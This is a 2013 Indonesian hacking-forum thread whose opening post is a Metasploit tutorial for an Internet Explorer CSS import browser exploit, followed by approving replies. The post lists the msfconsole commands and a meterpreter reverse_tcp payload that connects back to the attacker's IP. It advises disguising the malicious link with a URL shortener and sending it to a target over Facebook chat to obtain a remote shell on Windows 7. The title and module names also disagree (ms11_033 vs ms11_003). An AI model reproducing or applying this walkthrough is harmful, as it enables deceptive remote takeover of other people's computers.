exploit ms11_033_ie_css_import - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: exploit ms11_033_ie_css_import (/thread-4473.html) |
exploit ms11_033_ie_css_import - larcenciels - 04-26-2013 ini sih sebenernya akal akalan nya si bleki orion , tapi ilmu emang buat dishare kok :d langsung aja tutorial nya , maap berantakan exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =)) pertama jelas buka termanal dong 1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro. msf > use exploit/windows/browser/ms11_003_ie_css_import 2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp 3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14 msf exploit(ms11_003_ie_css_import) > set URIPATH / 4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya. Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut. Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =)) msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080 5. Lanjut kita exploit 6. nah , http://192.168.151.14:8080 intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer. 7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in 8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah. 9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut. 10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened" coba di enter trus kita interaksi dengan meterpreter id 1 nah , masuk sesi meterpreter , mari kita lihat info O.S nya ckck windows 7 pwned :-? ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =)) RE: exploit ms11_033_ie_css_import - orochimadit - 04-26-2013 keren om keren makasih inponya ijin disedot ilmunya RE: exploit ms11_033_ie_css_import - larcenciels - 04-26-2013 (04-26-2013, 04:03 PM)orochimadit Wrote: keren om keren makasih inponya ijin disedot ilmunya silahkan om (04-26-2013, 04:03 PM)orochimadit Wrote: keren om keren makasih inponya ijin disedot ilmunya silahkan om (04-26-2013, 04:03 PM)orochimadit Wrote: keren om keren makasih inponya ijin disedot ilmunya silahkan om RE: exploit ms11_033_ie_css_import - pemula - 05-26-2013 wah keren tuh sob ... klo di ganti pke ip publik bisa ga tuh ???? RE: exploit ms11_033_ie_css_import - wine trochanter - 05-26-2013 keren2 nice tutor om nulbe RE: exploit ms11_033_ie_css_import - achmad_zzz - 05-27-2013 keren om.. tapi mesti pake IE yah? kan udah jarang orang indo pake IE.. RE: exploit ms11_033_ie_css_import - Junior Riau - 05-28-2013 nice wak, lanjuik taruih buek tutor e |